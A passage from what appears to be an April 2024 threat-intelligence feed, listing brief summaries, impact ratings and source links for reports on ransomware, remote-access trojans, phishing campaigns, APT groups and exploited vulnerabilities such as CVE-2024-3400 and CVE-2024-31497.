Summary:: The Red Report 2024 by Picus Security include critical vulnerabilities exploited by threat actors, such as PAN-OS command injection and PuTTY SSH client vulnerability, alongside targeted attacks by groups like IntelBroker and Sandworm

Source: https://www.picussecurity.com/resource/blog/april-19-top-threat-actors-malware-vulnerabilities-and-exploits

Intel Source:: Avast

Intel Name:: Technical_Analysis_of_Lazarus_Groups_Sophisticated_Attack_Chain_Targeting_Asian_Individuals

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: Avast's investigation uncovers a sophisticated campaign by the Lazarus group targeting individuals in Asia with fabricated job offers. The attack, employing fileless malware and multi-layered loaders, showcases advanced evasion techniques and intricate C&C communication. The involvement of the Kaolin RAT highlights the group's commitment to control and data extraction.

Source: https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams

Intel Source:: Seqrite

Intel Name:: Unveiling_Ghost_Locker_2

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: Seqrite researchers have discovered the two versions of the Ghost Locker ransomware during their threat hunting activities. The initial variant, coded in Python, secures its presence by replicating itself in the Windows Startup directory and utilizes AES encryption to lock files. This variant communicates with a C2 server to dispatch ransom demands and extract data. The subsequent variant, mostly developed in Golang, mirrors the characteristics of the first iteration but distinguishes itself in terms of C2 server interactions and operational procedures. Moreover, it incorporates mechanisms to evade detection and carefully chooses files for encryption and data extraction.

Source: https://www.seqrite.com/blog/ghost-locker-2-0-the-evolving-threat-of-ransomware-as-a-service-unveiled-by-ghostsec/

Intel Source:: SOC Radar

Intel Name:: Security_Risks_in_OpenMetadata

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: Researchers from Microsoft have discovered the critical vulnerabilities within the OpenMetadata platform, an open-source system designed to manage metadata across various data sources. These vulnerabilities affect versions of OpenMetadata earlier than 1.3.1, potentially allowing attackers to bypass authentication and execute Remote Code Execution (RCE).

Source: https://socradar.io/openmetadata-attackers-cryptomine-in-kubernetes/

Intel Source:: NSFOCUS

Intel Name:: Palo_Alto_Networks_Fixes_Critical_Command_Injection_Vulnerability_in_PAN_OS_Firewall

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: NSFOCUS CERT has detected a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks' PAN-OS firewall operating system. Unauthenticated attackers could exploit this flaw to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks has released security updates addressing this vulnerability, with the PoC already public and actively exploited. The CVSS score of 10.0 underscores the severity of the issue. Users are urged to upgrade to patched versions immediately.

Source: https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/

Intel Source:: Stairwell

Intel Name:: The_CVE_2024_31497_PuTTY_vulnerability

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: In the Stairwell blog, the analysts discuss the details of a vulnerability, CVE-2024-31497, found in the PuTTY SSH libraries by researchers at Ruhr University Bochum. It allows attackers to access private keys used in key-based authentication. The blog provides a list of potentially vulnerable software, known vulnerable hashes, and a YARA rule for detection, and mentions the importance of quickly addressing supply chain vulnerabilities. The background of the vulnerability is explained, along with a list of potentially vulnerable software not mentioned in the NIST advisory.

Source: https://stairwell.com/resources/stairwell-threat-report-vulnerable-putty-ssh-libraries-cve-2024-31497/

Intel Source:: CERT-UA

Intel Name:: Malicious_Attack_Targeting_Defense_Forces_of_Ukraine

Date of Scan:: 2024-04-19

Impact:: MEDIUM

Summary:: The Government Computer Emergency Response Team of Ukraine (CERT-UA) has issued an urgent alert regarding a targeted cyber attack on a computer within the Defense Forces of Ukraine. The attack involves the distribution of a malicious file named "Support.rar" via the Signal messenger, purportedly under the guise of document submission for UN Peace Support Operations. This file contains an exploit for a WinRAR software vulnerability (CVE-2023-38831). Upon successful exploitation, a CMD file is executed, initiating PowerShell scripts associated with the COOKBOX malware.

Source: https://cert.gov.ua/article/6278620

Intel Source:: Zscaler

Intel Name:: The_newly_discovered_backdoor_MadMxShell

Date of Scan:: 2024-04-18

Impact:: LOW

Summary:: Zscaler provided the details of a new backdoor, MadMxShell, discovered by ThreatLabz. The backdoor is delivered through a ZIP archive and uses obfuscated shellcodes to extract and decode an executable file. It also has a dropper stage and a final backdoor stage for collecting system information and executing commands. The backdoor communicates with its C2 server through DNS MX queries and responses, using a custom method to encode data.

Source: https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell

Intel Source:: Trend Micro

Intel Name:: UK_Law_Enforcement_Successfully_Takes_Down_Phishing_as_a_Service_Provider_LabHost

Date of Scan:: 2024-04-18

Impact:: MEDIUM

Summary:: UK’s Metropolitan Police Service, in collaboration with international law enforcement agencies and private industry partners, executed an operation leading to the takedown of the notorious Phishing-as-a-Service (PhaaS) provider LabHost. LabHost, also known as LabRat, had gained notoriety since its emergence in late 2021 for offering a platform facilitating phishing attacks against numerous banks and organizations worldwide. With over 2,000 criminal users and more than 40,000 fraudulent sites deployed, LabHost posed a significant threat to global cybersecurity.

Source: https://www.trendmicro.com/en_us/research/24/d/labhost-takedown.html

Intel Source:: CISA

Intel Name:: A_wide_range_of_Akira_ransomware

Date of Scan:: 2024-04-18

Impact:: HIGH

Summary:: According to a joint advisory from the FBI, CISA, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

Intel Source:: ASEC

Intel Name:: Analysis_of_Pupy_RAT

Date of Scan:: 2024-04-18

Impact:: LOW

Summary:: ASEC researchers discovered that many bad actors are using Pupy RAT, a tricky type of software. Pupy RAT allows them to control computers from far away and do things like stealing data and getting more control over the system. Now, it's not just targeting Windows computers; it's also affecting Linux systems, especially in countries like South Korea.

Source: https://asec.ahnlab.com/en/64258/

Intel Source:: Securelist

Intel Name:: Unveiling_the_DuneQuixote_Malware_Campaign

Date of Scan:: 2024-04-18

Impact:: LOW

Summary:: Researchers at Securelist have discovered a new malware campaign named "DuneQuixote," specifically aimed at government organizations within the Middle East. This campaign comprises more than 30 dropper samples, each carrying a backdoor labeled "CR4T." The primary objective of this malware is to secretly infiltrate and manage compromised systems.

Source: https://securelist.com/dunequixote/112425/

Intel Source:: Cisco Talos

Intel Name:: The_upload_of_confidential_documents_to_VirusTotal_by_OfflRouter_virus

Date of Scan:: 2024-04-18

Impact:: MEDIUM

Summary:: Recently, Cisco Talos discovered documents with some sensitive information from Ukraine. The documents had malicious VBA code, indicating they may be used as a trick to infect organizations. The virus, OfflRouter, has been known in Ukraine since 2015 and is still active on some Ukrainian organizations’ networks, based on over 100 original infected documents uploaded to VirusTotal from Ukraine and the documents’ upload dates.

Source: https://blog.talosintelligence.com/offlrouter-virus-causes-upload-confidential-documents-to-virustotal/

Intel Source:: Thehackernews

Intel Name:: Malvertising_Campaign_Leveraging_Google_Ads_Distributes_MadMxShell_Backdoor

Date of Scan:: 2024-04-18

Impact:: MEDIUM

Summary:: Zscaler ThreatLabz researchers have uncovered a sophisticated malvertising campaign utilizing Google Ads to distribute a previously unknown backdoor named MadMxShell. The campaign involves the registration of multiple domains resembling legitimate IP scanner software, which are then promoted through Google Ads to target specific search keywords. Victims who visit these sites are tricked into downloading a malicious file disguised as IP scanner software. Once executed, the malware employs DLL side-loading and process hollowing techniques to infect systems, ultimately establishing a backdoor for gathering system information and performing malicious activities.

Source: https://thehackernews.com/2024/04/malicious-google-ads-pushing-fake-ip.html

Intel Source:: McAfee

Intel Name:: A_new_packed_variant_of_the_Redline_Stealer_trojan

Date of Scan:: 2024-04-18

Impact:: MEDIUM

Summary:: Recently, McAfee telemetry data showed the details of a new variant of the Redline Stealer trojan that uses Lua bytecode to perform malicious activities. It is prevalent in various regions and is distributed through GitHub. The trojan creates persistence on infected machines and communicates through HTTP, while also being able to take screenshots and steal data. McAfee also covered the analysis of the bytecode file and the techniques used by the threat actors, including creating a mutex and retrieving information from the Windows registry.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/

Intel Source:: Blackberry

Intel Name:: Threat_actors_FIN7_attack_the_US_Automotive

Date of Scan:: 2024-04-17

Impact:: MEDIUM

Summary:: Blackberry's analysts shared the examined details about the threat of phishing attacks on businesses and provided recommendations for protecting against them. It includes a case study of a recent attack by the threat group FIN7 on a U.S. automotive company. The article suggests implementing various security measures, such as employee training, multi-factor authentication, and incident response plans, to prevent and mitigate the impact of phishing attacks. It also provides a detailed analysis of the tactics and techniques used by FIN7 in their attack, as well as a list of indicators of compromise.

Source: https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry

Intel Source:: Cado Security

Intel Name:: Critical_Atlassian_Flaw_Exploited_to_Deploy_Linux_Variant_of_Cerber_Ransomware

Date of Scan:: 2024-04-17

Impact:: MEDIUM

Summary:: Researchers at Cado Security have noticed that threat actors are using unpatched Atlassian servers as a means of distributing the Linux version of the Cerber ransomware, also known as C3RB3R. The attacks take use of a significant security flaw in the Atlassian Confluence Data Center and Server known as CVE-2023-22518 (CVSS score: 9.1), which enables an unauthorized attacker to reset Confluence and create an administrator account.

Source: https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads

Intel Source:: ISC.SANS

Intel Name:: The_Peril_of_Malicious_Annotations

Date of Scan:: 2024-04-17

Impact:: LOW

Summary:: ISC.SANS researchers provided PDF files, long considered "read-only" and benign, remain a potent vector for malware delivery. Despite improvements in PDF viewer security, malicious actors exploit features like annotations and clickable links to deceive users into downloading malware. This analysis delves into the intricacies of PDF file structure, demonstrating how attackers embed clickable zones using "/Annot" keywords to link to external URLs. The provided YARA rule offers a means to detect such malicious PDF documents

Source: https://isc.sans.edu/diary/rss/30848

Intel Source:: CERT-UA

Intel Name:: Cyber_Threats_Targeting_Ukraine_Defense_Forces

Date of Scan:: 2024-04-17

Impact:: MEDIUM

Summary:: Researchers at CERT-UA are actively engaged to protect against online dangers. They noticed that in 2024, a group called UAC-0184 became more active. This group tries to steal documents and chat messages from computers used by Ukraine's Defense Forces. They often send harmful software through popular chat apps, tricking people with fake messages about legal issues or war videos.

Source: https://cert.gov.ua/article/6278521

Intel Source:: Cisco Talos

Intel Name:: Attacks_Using_Brute_Force_to_Attack_VPN_and_SSH_Services

Date of Scan:: 2024-04-17

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos have recently alerted about a global increase in brute-force attacks that, as of at least March 18, 2024, are targeting a variety of devices, including web application authentication interfaces, virtual private network (VPN) services, and SSH services. All of these attacks seem to be coming from anonymizing tunnels and proxies, as well as TOR exit nodes.

Source: https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/

Intel Source:: Forescout

Intel Name:: A_Recent_Wild_Exploit_Campaign_Targets_Media_Company

Date of Scan:: 2024-04-17

Impact:: LOW

Summary:: Forescout researchers have discovered that Vedere Labs describes an exploitation effort that targets businesses using FortiClient EMS from Fortinet, which is vulnerable to CVE-2023-48788.

Source: https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/

Intel Source:: Fortinet

Intel Name:: Botnets_Continue_Exploiting_CVE_2023_1389

Date of Scan:: 2024-04-17

Impact:: MEDIUM

Summary:: Fortinet researchers in their article explored patterns of the infection traffic and insights into the botnet that was exploited last year and believed to be exploited widely this month by a command injection vulnerability, CVE-2023-1389 was disclosed and a fix developed for the web management interface of the TP-Link Archer AX21 (AX1800). Recently, research has observed multiple attacks focusing on this year-old vulnerability, spotting botnets like Moobot, Miori, the Golang-based agent “AGoent,” and the Gafgyt Variant.

Source: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread

Intel Source:: Netscope

Intel Name:: Evil_Ant_Ransomware

Date of Scan:: 2024-04-17

Impact:: LOW

Summary:: Netscope researchers shared the analysis of a new ransomware strain called Evil Ant. It targets personal folders and external drives for encryption and requires administrator privileges to function properly. It also disables Windows Defender and Task Manager, collects the victim's IP address, and uses Fernet symmetric cryptography to encrypt files.

Source: https://www.netskope.com/jp/blog/netskope-threat-coverage-evil-ant-ransomware

Intel Source:: Blackberry

Intel Name:: LightSpy_campaign_returns

Date of Scan:: 2024-04-16

Impact:: LOW

Summary:: Blackberry researchers shared the details of the LightSpy campaign, a mobile espionage operation targeting individuals in Southern Asia, potentially with state-sponsored involvement. The "Title-Abstract" section delves into the technical details of the malware, its Chinese origins, and the advanced techniques used. The "Abstract" section offers recommendations for individuals and organizations to protect themselves. The "LightSpy Returns" section discusses the campaign's return with expanded capabilities and the threat actor group behind it. The article emphasizes the need for increased vigilance and robust security measures in the targeted region.

Source: https://blogs.blackberry.com/en/2024/04/lightspy-returns-renewed-espionage-campaign-targets-southern-asia-possibly-india

Intel Source:: PaloAlto

Intel Name:: Campaign_For_Contact_Forms_Distributes_SSLoad_Malware

Date of Scan:: 2024-04-16

Impact:: LOW

Summary:: Researchers at Palo Alto have noticed that the MSI file's WebDAV server has stopped operating. They have observed this effort spreading Latrodectus malware in the last few weeks. But Latrodectus is not the MSI linked to this specific infection chain.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt

Intel Source:: Proofpoint

Intel Name:: Decoding_TA427

Date of Scan:: 2024-04-16

Impact:: LOW

Summary:: Proofpoint researchers discovered a group called TA427, who are really busy causing trouble. They pretend to be experts from North Korea in different fields like education, news, and research. They do this to trick other experts and sneak into their organizations to gather important information. TA427 has been quite successful at this and doesn't seem to be stopping anytime soon. They're quick to change their methods and create new identities when needed.

Source: https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering

Intel Source:: Positive Technologies

Intel Name:: TA558_Worldwide_Attacks

Date of Scan:: 2024-04-16

Impact:: MEDIUM

Summary:: Researchers at Positive Technologies have discovered a group called TA558 has carried out over 300 attacks worldwide. They are using an old vulnerability called CVE-2017-11882 to spread malware through a campaign called SteganoAmor. This campaign is affecting users in Latin America and other parts of the world. TA558 hides malware within its attacks using a technique called steganography.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/#id0

Intel Source:: Palo Alto, Volexity

Intel Name:: Zero_Day_Exploitation_of_Unauthenticated_RCE_Vulnerability_in_GlobalProtect

Date of Scan:: 2024-04-15

Impact:: HIGH

Summary:: Researchers at PaloAlto have identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.

Source: https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

Intel Source:: Bitdefender

Intel Name:: Malvertising_campaigns_hijack_social_media_to_spread_stealers

Date of Scan:: 2024-04-15

Impact:: LOW

Summary:: Threat actors have been copying AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of these AI software. The malicious webpages then download intrusive stealers such as Rilide, Vidar, IceRAT, and Nova Stealer.

Source: https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab

Intel Source:: Recorded Future

Intel Name:: The_spread_of_infostealers_by_a_Russian_cybercriminal_campaign

Date of Scan:: 2024-04-15

Impact:: LOW

Summary:: The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users.

Source: https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming

Intel Source:: Esentire

Intel Name:: SolarMarker_malware_campaigns

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: This month, eSentire's researchers discovered that SolarMarker malware campaigns now utilize PyInstaller to hide malicious PowerShell scripts, marking a shift from previous methods such as Inno Setup and PS2EXE.

Source: https://www.esentire.com/blog/solarmarkers-shift-to-pyinstaller-tactics

Intel Source:: Halcyon

Intel Name:: Halcyon_Threat_Insights_003

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: Halcyon researchers indicated and blocked a big range of threats that were missed by other security layers in their client’s environments that are often precursors to the delivery of the ransomware payload.

Source: https://www.halcyon.ai/blog/halcyon-threat-insights-003-march-2024

Intel Source:: Sucuri

Intel Name:: Embedding_a_credit_card_skimmer_in_a_fake_Facebook_Pixel_tracker_script

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: Recently Sucuri discovered an interesting case of this: the attackers took that a step further by embedding a credit card skimmer in a well-concealed fake Facebook Pixel tracker script.

Source: https://blog.sucuri.net/2024/04/credit-card-skimmer-hidden-in-fake-facebook-pixel-tracker.html

Intel Source:: Seqrite

Intel Name:: A_New_Banking_Trojan_Called_Coyote

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: Researchers at Seqrite have discovered a brand-new banking trojan known as Coyote, which makes use of a tool/library known as Squirrel Installer, designed to install and control Windows application updates. The software appears to be more sophisticated than typical banking trojans, and in the coming days, it may pose a more serious threat. This recently discovered malware identifies the market it targets and targets various banking institutions in Brazil.

Source: https://www.seqrite.com/blog/exposing-coyote-the-next-gen-banking-trojan-revolutionizing-cyber-threats-in-brazil/

Intel Source:: Trellix

Intel Name:: Observed_spike_of_LockBit_related_activity_of_vulnerabilities_in_ScreenConnect

Date of Scan:: 2024-04-12

Impact:: MEDIUM

Summary:: Recently, Trellix Researchers have observed a rise in LockBit-related cyber activity in vulnerabilities in ScreenConnect. Researchers are confident that the cybercriminals group behind LockBit ransomware partially restored their infrastructure and created a feeling that the LE actions did not affect their normal operation.

Source: https://www.trellix.com/blogs/research/the-lockbits-attempt-to-stay-relevant-its-imposters-and-new-opportunistic-ransomware-groups/

Intel Source:: Esentire

Intel Name:: A_series_of_tax_themed_phishing_emails_delivering_the_Remcos_RAT

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: Last month, eSentire researchers detected a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader. The phishing email contained the link to the password-protected ZIP archive hosted on Adobe Document Cloud.

Source: https://www.esentire.com/blog/tax-season-alert-beware-of-guloader-and-remcos-rat

Intel Source:: Esentire

Intel Name:: The_XWorm_Tax_Scam

Date of Scan:: 2024-04-12

Impact:: LOW

Summary:: Recently, Esentire SOC Analysts shared with their Threat Response Unit about the tax-themed threat delivering XWorm as the final payload. Researchers are certain the initial infection vector is via the phishing email.

Source: https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam

Intel Source:: Cyble

Intel Name:: A_sophisticated_FatalRAT_campaign_targeting_ryptocurrency_users

Date of Scan:: 2024-04-11

Impact:: MEDIUM

Summary:: Cyble researchers discovered a new phishing campaign aimed at cryptocurrency users. This campaign used a known FatalRAT and additional malware such as Clipper and Keylogger. The TAs target Chinese-speaking individuals or organizations, as evidenced by using Chinese-language installers. FatalRAT is a Remote Access Trojan that gives attackers control over the victim’s computer and is equipped with extensive capabilities for stealing sensitive information.

Source: https://cyble.com/blog/fatalrats-new-prey-cryptocurrency-users-in-the-crosshairs/

Intel Source:: Trend Micro

Intel Name:: A_Continuous_Refinement_of_Waterbear_and_Deuterbear_by_Earth_Hundun

Date of Scan:: 2024-04-11

Impact:: MEDIUM

Summary:: Researchers at TrendMicro have noticed a significant increase in cyberattacks that are directed on numerous organizations in different industries, including government, research, and technology. The cyberespionage group Earth Hundun, also known as BlackTech, is connected to the Waterbear malware family, which is responsible for these attacks. BlackTech is a threat actor that primarily targets government and technical institutions in the Asia-Pacific area.

Source: https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html

Intel Source:: ASEC

Intel Name:: Redis_Server_Used_to_Install_Metasploit_Meterpreter

Date of Scan:: 2024-04-11

Impact:: LOW

Summary:: Researchers from ASEC have found that the Redis service has been used to install the Metasploit Meterpreter backdoor. Redis is the shorthand for Remote Dictionary Server, an open-source in-memory database and data structure storage system. It is assumed that the threat actors employed vulnerability attacks to execute commands or exploited improper settings.

Source: https://asec.ahnlab.com/en/64034/

Intel Source:: CERT-AGID

Intel Name:: Credentials_Forwarded_to_Telegram_Bot_in_PEC_Phishing_Campaign

Date of Scan:: 2024-04-11

Impact:: LOW

Summary:: Researchers from CERT-AGID have discovered a phishing campaign that aims to get credentials for Certified Electronic Mail (PEC) boxes through fraud. An email containing false information is sent to PEC account holders to carry out fraudulent operations. The email notification warns of a said account deactivation request that must be performed within 24 hours and proposes clicking on a link provided in the message's body if the receiver believes this is an error.

Source: https://cert-agid.gov.it/news/campagna-di-phishing-pec-credenziali-inoltrate-ad-un-bot-telegram/

Intel Source:: Seqrite

Intel Name:: The_Rapid_Rise_of_Abyss_Locker_Ransomware

Date of Scan:: 2024-04-11

Impact:: MEDIUM

Summary:: Seqrite researchers have noticed that a recently launched ransomware operation called Abyss Locker has quickly taken aim at businesses and grown to be a serious threat to a variety of industries, including public sector organizations, businesses, and industrial control systems (ICS). It is a serious risk to Linux and Windows systems both.

Source: https://www.seqrite.com/blog/unveiling-abyss-locker-the-rapid-rise-of-a-menacing-ransomware-threat/

Intel Source:: HP Wolf

Intel Name:: New_Raspberry_Robin_Malware_Campaign_Spreading_Through_WSF_Files

Date of Scan:: 2024-04-11

Impact:: HIGH

Summary:: HP wolf security researchers have discovered a new Raspberry Robin campaign wave that propagates the malware through malicious Windows Script Files (WSFs) since March 2024. The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection.

Source: https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/

Intel Source:: Krebson Security

Intel Name:: The_exposure_of_Privnote_Phishing_Sites

Date of Scan:: 2024-04-11

Impact:: LOW

Summary:: A network of websites that mimic the self-destructing messaging service Privnote.com is being used by cybercriminals to steal cryptocurrency addresses, reports the BBC’s Yolande Knell.

Source: https://krebsonsecurity.com/2024/04/fake-lawsuit-threat-exposes-privnote-phishing-sites/

Intel Source:: Rapid7

Intel Name:: Continuation_of_execution_of_IDAT_Loader

Date of Scan:: 2024-04-11

Impact:: MEDIUM

Summary:: In part 2 of this series, Rapid7 continues to provide an analysis of how an MSIX installer led to the download and execution of the IDAT Loader. After they analyzed the recent tactics, techniques, and procedures observed (TTPs), Rapid7 concluded that the activity is associated with financially motivated threat groups.

Source: https://www.rapid7.com/blog/post/2024/04/10/stories-from-the-soc-part-2-msix-installer-utilizes-telegram-bot-to-execute-idat-loader/

Intel Source:: Cyble

Intel Name:: Active_exploitation_continues_of_critical_D_Link_NAS_vulnerability

Date of Scan:: 2024-04-11

Impact:: MEDIUM

Summary:: Security analysts continue to observe the exploitation of critical D-Link NAS vulnerabilities. Cyble Global Sensor Intelligence Observes Active Exploitation Of Critical D-Link NAS Vulnerabilities. The vulnerabilities, identified as CVE-2024-3272 and CVE-2024-3273 were discovered originally by some analyst who goes by the alias “netsecfish” on GitHub last month. D-Link disclosed the same on April 4, 2024. Cyble Intel network picked up ongoing exploitation attempts of these vulnerabilities from April 09 itself. This also indicates the swift weaponization of publicly available exploits by Threat Actors (TAs) targeting vulnerable internet-exposed D-Link NAS. Affected products are D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L up to 20240403.

Source: https://cyble.com/blog/critical-d-link-nas-vulnerability-under-active-exploitation/

Intel Source:: Malwarebytes

Intel Name:: Malicious_Campaign_Targeting_System_Administrator_With_Nitrogen_Malware

Date of Scan:: 2024-04-10

Impact:: LOW

Summary:: Malwarebytes Labs researchers have observed an ongoing campaign targeting at system administrators through fake ads for well-known system tools. These ads pop up as sponsored links on Google searches, mainly in North America. Victims are lured into downloading what appears to be PuTTY or FileZilla installers but are actually Nitrogen malware. This malware allows hackers to breach networks, steal data, and introduce ransomware like BlackCat/ALPHV.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/04/active-nitrogen-campaign-delivered-via-malicious-ads-for-putty-filezilla

Intel Source:: Sysdig

Intel Name:: An_Established_Romanian_APT_Group_RUBYCARP

Date of Scan:: 2024-04-10

Impact:: LOW

Summary:: Sysdig researchers have uncovered a persistent botnet maintained by a Romanian threat actor group which they are referring to as RUBYCARP. This threat actor appears to have been active for a minimum of ten years based on the evidence. Its main mode of operation makes use of a botnet that has been set up through a number of open exploits and brute force attacks. The group uses both public and secret IRC networks for communication. It also creates cyberweapons and target databases. Finally, it employs its botnet to mine cryptocurrency and send phishing scams.

Source: https://sysdig.com/blog/rubycarp-romanian-botnet-group/

Intel Source:: Strikeready

Intel Name:: Activity_of_Sidewinder_Threat_Group

Date of Scan:: 2024-04-10

Impact:: MEDIUM

Summary:: This in-depth examination explores the methods used by the cybersecurity experts to locate and identify infrastructure connected to the Sidewinder threat organization. It describes a broad architecture with several search queries applied to different data sources with the goal of finding signs and artifacts associated with the adversary's activities. The methodology consists of searching for particular strings, payloads that have been encoded, network fingerprints, and using intelligence feeds to find new domains, IPs, and possible infrastructure that the group uses for command and control.

Source: https://blog.strikeready.com/blog/rattling-the-cage-of-a-sidewinder

Intel Source:: Proofpoint

Intel Name:: TA547_Targets_German_Organizations_with_Rhadamanthys_Malware

Date of Scan:: 2024-04-10

Impact:: LOW

Summary:: Proofpoint researchers have discovered a group called TA547 is sending emails to German organizations with Rhadamanthys malware. This malware steals information and is used by many cybercriminals. The group also seems to be using a PowerShell script possibly created by large language models like ChatGPT or Gemini.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer

Intel Source:: Checkmarx

Intel Name:: Hackers_Using_New_Technique_to_Trick_Developers_in_Open_Source_Supply_Chains

Date of Scan:: 2024-04-10

Impact:: MEDIUM

Summary:: Researchers at Checkmarx have examined the concerning practice of hackers using GitHub's search feature to spread malware. Secretly creating repositories with well-known names and subjects, attackers trick unsuspecting users into downloading and running harmful programs.

Source: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/

Intel Source:: sophos

Intel Name:: Exposing_Smoke_and_Screen_Mirrors_Backdoor

Date of Scan:: 2024-04-10

Impact:: LOW

Summary:: Researchers at Sophos have investigated the finding of a trick backdoor hidden in an executable file that was disguising itself as a genuine Microsoft Hardware Publisher Certificate. The analysis reveals the backdoor's association with LaiXi Android Screen Mirroring, a software package that appears benign at first glance. It also reveals the strategies threat actors use to avoid discovery.

Source: https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/

Intel Source:: ISC.SANS

Intel Name:: A_potential_threat_detected_in_the_customer_environment

Date of Scan:: 2024-04-10

Impact:: LOW

Summary:: The senior SecOps analyst recently discussed a potential threat detected in our environment. It started with the investigation of a group called Wazawaka and after a study of Wazawaka’s activities, the threat-hunting team created numerous SentinelOne queries to detect similar activity. Although the threat-hunting team concluded that this activity was not a result of Wazawaka, they decided to continue further investigation.

Source: https://isc.sans.edu/diary/A+Use+Case+for+Adding+Threat+Hunting+to+Your+Security+Operations+Team+Detecting+Adversaries+Abusing+Legitimate+Tools+in+A+Customer+Environment+Guest+Diary/30816/

Intel Source:: PTsecurity

Intel Name:: LazyStealer_analysis

Date of Scan:: 2024-04-09

Impact:: MEDIUM

Summary:: In the first quarter of 2024, Positive Technologies' Expert Security Center (PT ESC) uncovered a series of attacks targeting government structures in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. The primary goal was to steal account credentials from various services used by government employees' computers. This group, dubbed Lazy Koala due to their simple techniques and the username managing the Telegram bots with stolen data, used a malware called LazyStealer, which was straightforward but effective. All victims were directly notified about the compromise.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazystealer-sophisticated-does-not-mean-better/?sphrase_id=300945

Intel Source:: Fortinet

Intel Name:: Attackers_Delivering_Multi_Stage_Malware_via_Invoice_Phishing

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: Fortinet researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.

Source: https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins

Intel Source:: Perception-Point

Intel Name:: Phishing_campaign_targets_LinkedIn_users

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: This blog highlights a new LinkedIn threat, one that combines breached accounts and an evasive 2-step phishing attack.

Source: https://perception-point.io/blog/professionally-hooked-microsoft-two-step-phishing-campaign-targets-linkedin-users/

Intel Source:: Greynoise

Intel Name:: A_wild_explotation_of_D_Link_NAS_RCE

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: A remote code execution vulnerability in D-Link NAS devices is actively being exploited and is tracked under CVE-2024-3273. The vulnerability is believed to affect as many as 92,000 devices

Source: https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild

Intel Source:: CERT-AGID

Intel Name:: A_Constant_Was_Found_in_AgentTesla_Italian_Campaigns

Date of Scan:: 2024-04-09

Impact:: MEDIUM

Summary:: CERT-AGID researchers have noticed unusually high activity that is distinguished by the usage of PDF files. The distribution of AgentTesla in Italy is the focus of yet another massive operation that has been underway for the past nine months or thereabouts. As a result, it appears to have a regular monthly timing.

